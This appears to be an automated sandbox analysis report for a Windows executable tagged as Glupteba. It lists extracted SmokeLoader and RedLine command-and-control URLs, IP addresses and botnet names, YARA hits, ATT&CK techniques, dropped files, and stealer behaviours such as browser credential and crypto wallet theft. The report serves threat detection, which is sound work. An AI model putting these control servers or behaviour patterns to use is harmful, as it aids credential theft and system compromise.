glupteba | 30befd088724719df66035cff6175ec647a4e80ec049eb84ba0a769e08c9e60c

Analysis

max time kernel
146s
max time network
164s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2023 05:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06e964d72a34dc9e1cc80e3a8fe9bdeb.exe
Size

799KB
MD5

06e964d72a34dc9e1cc80e3a8fe9bdeb
SHA1

58f6a85a578901f1fa64ac9598e47eb121836843
SHA256

30befd088724719df66035cff6175ec647a4e80ec049eb84ba0a769e08c9e60c
SHA512

59ceec8e5aa6453ecf8e6fae57251f88a07ad9b34665143c648e252a6f0af75479a5607839bb0a89621938d0afc340c37778b383a431b586ea4f1412304f1bfb
SSDEEP

24576:ry5rqmZj5AaeuIseC/GRLYDHILx4wqMwFY:e5rNZ9ZetJEGK0F49

Malware Config

Extracted

Family

smokeloader

Version

2022

http://5.42.92.190/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

redline

Botnet

pixelfresh

194.49.94.11:80

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Detect Mystic stealer payload 4 IoCs

resource	yara_rule
behavioral1/memory/6608-437-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6608-440-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6608-451-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6608-457-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family

Detect ZGRat V1 15 IoCs

resource	yara_rule
behavioral1/memory/1576-1949-0x00000000020C0000-0x0000000002112000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1963-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1967-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1971-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1974-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1976-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1978-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1980-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1982-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-1984-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-2000-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-2003-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-2006-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-2009-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1576-2017-0x0000000002550000-0x000000000259A000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 3 IoCs

resource	yara_rule
behavioral1/memory/6772-1514-0x0000000002F00000-0x00000000037EB000-memory.dmp	family_glupteba
behavioral1/memory/6772-1515-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/6772-1798-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 20 IoCs

resource	yara_rule
behavioral1/memory/5700-1108-0x0000000000400000-0x0000000000449000-memory.dmp	family_redline
behavioral1/memory/5700-1110-0x00000000001C0000-0x00000000001FE000-memory.dmp	family_redline
behavioral1/memory/5564-1119-0x0000000000470000-0x00000000004CA000-memory.dmp	family_redline
behavioral1/memory/5564-1122-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline
behavioral1/memory/7488-1158-0x0000000000970000-0x000000000098E000-memory.dmp	family_redline
behavioral1/memory/1576-1949-0x00000000020C0000-0x0000000002112000-memory.dmp	family_redline
behavioral1/memory/1576-1963-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1967-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1971-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1974-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1976-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1978-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1980-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1982-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-1984-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-2000-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-2003-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-2006-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-2009-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/1576-2017-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/7488-1158-0x0000000000970000-0x000000000098E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4428 created 3152	4428	latestX.exe	55
PID 4428 created 3152	4428	latestX.exe	55
PID 4428 created 3152	4428	latestX.exe	55
PID 4428 created 3152	4428	latestX.exe	55
PID 4428 created 3152	4428	latestX.exe	55

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
1624	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 15 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1576-1949-0x00000000020C0000-0x0000000002112000-memory.dmp	net_reactor
behavioral1/memory/1576-1963-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1967-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1971-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1974-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1976-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1978-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1980-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1982-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-1984-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-2000-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-2003-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-2006-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-2009-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor
behavioral1/memory/1576-2017-0x0000000002550000-0x000000000259A000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation	4467.exe

Executes dropped EXE 21 IoCs

pid	Process
760	NO9ll22.exe
4396	1om77Gk1.exe
2740	2Kf7265.exe
6892	3co79xu.exe
3312	4467.exe
7488	52A0.exe
5700	59E5.exe
5564	5EA8.exe
7764	InstallSetup5.exe
6848	toolspub2.exe
6772	31839b57a4f11171d6abc8bbc4451ee4.exe
7012	Broom.exe
4428	latestX.exe
396	toolspub2.exe
5700	AAA7.exe
1992	updater.exe
6024	61E2.exe
1576	78F5.exe
6804	7A7D.exe
5244	7BA7.exe
392	31839b57a4f11171d6abc8bbc4451ee4.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	06e964d72a34dc9e1cc80e3a8fe9bdeb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	NO9ll22.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0003000000022612-12.dat	autoit_exe
behavioral1/files/0x0003000000022612-13.dat	autoit_exe

Detected potential entity reuse from brand microsoft.
phishing microsoft
Detected potential entity reuse from brand paypal.
phishing paypal

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2740 set thread context of 6608	2740	2Kf7265.exe	147
PID 6848 set thread context of 396	6848	toolspub2.exe	195
PID 5700 set thread context of 2468	5700	AAA7.exe	225

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
228	sc.exe
6304	sc.exe
3924	sc.exe
4564	sc.exe
4056	sc.exe
2296	sc.exe
3784	sc.exe
6828	sc.exe
408	sc.exe
7156	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6520	6608	WerFault.exe	147

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3co79xu.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3co79xu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3co79xu.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5592	msedge.exe
5592	msedge.exe
5656	msedge.exe
5656	msedge.exe
5676	msedge.exe
5676	msedge.exe
5556	msedge.exe
5556	msedge.exe
6040	msedge.exe
6040	msedge.exe
5820	msedge.exe
5820	msedge.exe
2900	msedge.exe
2900	msedge.exe
5376	msedge.exe
5376	msedge.exe
7488	msedge.exe
7488	msedge.exe
7496	msedge.exe
7496	msedge.exe
6892	3co79xu.exe
6892	3co79xu.exe
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
6892	3co79xu.exe
396	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs

pid	Process
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe
2900	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
